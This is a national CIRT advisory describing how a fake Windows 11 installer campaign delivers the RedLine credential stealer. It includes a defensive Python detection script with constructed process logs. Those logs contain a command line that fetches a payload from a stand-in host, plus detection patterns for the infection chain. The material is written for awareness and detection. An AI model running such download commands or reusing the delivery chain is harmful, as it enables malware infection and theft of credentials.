Fake Windows 11 Upgrade Installers infect PC with Redline Malware (10th February 2022)

Ref# AL2022_08 | Date: Feb 10th 2022

Description

Attackers have started distributing fake Windows 11 upgrade installers to Windows 10 users, tricking them into downloading and running the RedLine stealer malware.

Summary

Because RedLine is the most widely used stealer of passwords, browser cookies, credit card data and cryptocurrency wallet information, its attacks can have disastrous consequences for victims.

According to the HP researchers who discovered the campaign, the attackers used the legitimate-looking site “windows-upgraded.com” to deliver the malware.

The site mimics a genuine Microsoft page; users who clicked the “Download Now” button received a 1.5 MB ZIP archive named “Windows11InstallationAssistant.zip”, served directly from a Discord CDN.

How it works

Decompressing the archive yields a folder that is 753 MB in size; the 99.8% compression ratio is due to padding (filler data) inside the executable.

When the victim runs the downloaded executable, a PowerShell process is started with an encoded argument. This in turn launches a cmd.exe process with a 21-second timeout, after which a .jpg file is retrieved from a remote server.

That file contains a DLL whose contents are stored reversed, most likely to evade detection and analysis.

The initial stage then loads this DLL and substitutes it for the existing thread context. The DLL is the RedLine payload, which communicates with a command-and-control server over TCP to receive instructions on which malicious actions to perform next on the newly infected machine.
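A defender-side check for the chain described above, written as an added example (not code from the advisory or from HP): it decodes a PowerShell encoded argument and flags the installer → PowerShell → cmd.exe-with-timeout → .jpg download sequence in process-creation records. The log records and the encoded argument are constructed, and the Sysmon Event ID 1 style field names are an assumption.

```python
import base64
import re

# Constructed stand-in for the encoded argument; the real one is not on the page.
_ENCODED = base64.b64encode(
    "cmd /c timeout 21 & curl http://example.invalid/win11.jpg".encode("utf-16le")
).decode()

# Constructed Sysmon Event ID 1 style records mirroring the described chain.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\u\Downloads\Windows11InstallationAssistant.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c timeout 21 & curl http://example.invalid/win11.jpg -o win11.jpg"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the indicator names one process-creation event matches."""
    hits = []
    image, parent, cmd = event["Image"].lower(), event["ParentImage"].lower(), event["CommandLine"]
    if image.endswith("powershell.exe") and decode_encoded_command(cmd) is not None:
        hits.append("powershell_encoded_command")
        if "installationassistant" in parent:   # spawned by the fake installer
            hits.append("spawned_by_fake_installer")
    if image.endswith("cmd.exe") and parent.endswith("powershell.exe"):
        # cmd.exe started by PowerShell that sleeps via timeout and then fetches a .jpg
        if re.search(r"\btimeout\s+\d+", cmd, re.I) and re.search(r"https?://\S+\.jpg", cmd, re.I):
            hits.append("cmd_timeout_then_jpg_download")
    return hits

def scan(events):
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Decoding the encoded argument is what lets an analyst see the second stage without executing the sample; the regex indicators are deliberately narrow and should be tuned to local telemetry.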

Remediation

To avoid this type of malware, users are advised to follow the steps below:

  • Before downloading any Microsoft product update, verify directly with Microsoft that the website offering it is genuine.
  • Register with several CIRTs for daily bulletins on worldwide software and hardware updates; the CIRT's internal team and partner agencies verify content before it is published.
  • Become familiar with Microsoft's monthly software updates, which are released on the second Tuesday of each month, commonly known as Patch Tuesday.
  • Do not download any Microsoft products from a third-party website.

The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.

PDF Download: Fake Windows 11 Upgrade Installers infect PC with Redline Malware.pdf
